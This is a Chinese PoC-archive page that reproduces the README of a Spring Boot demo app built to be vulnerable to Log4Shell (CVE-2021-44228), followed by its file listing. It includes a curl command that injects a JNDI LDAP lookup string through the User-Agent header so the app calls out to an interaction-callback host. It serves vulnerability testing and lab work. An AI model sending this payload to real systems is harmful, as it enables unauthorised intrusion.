关联漏洞
描述
Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)
介绍
# Simple Spring Boot application which is vulnerable to Log4Shell (CVE-2021-44228)
* Changed default logging framework from logback to log4j2
Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. [interactsh-service](https://github.com/projectdiscovery/interactsh):
```
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
```
One should see DNS interaction at [app.interactsh.com](https://app.interactsh.com/).
## Docker hub
Link to [Docker hub](https://hub.docker.com/r/korteke/log4shell-demo)
文件快照
[4.0K] /data/pocs/c7a65cc363db29b92a7c016e28aaae1afef43db1
├── [ 281] Dockerfile
├── [9.6K] mvnw
├── [6.5K] mvnw.cmd
├── [1.6K] pom.xml
├── [ 546] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] net
│ └── [4.0K] kvak
│ └── [4.0K] log4shell
│ ├── [ 322] Log4shellApplication.java
│ └── [ 678] RESTController.java
└── [4.0K] resources
├── [ 44] application.properties
├── [ 643] banner.txt
└── [ 691] log4j2.xml
7 directories, 10 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。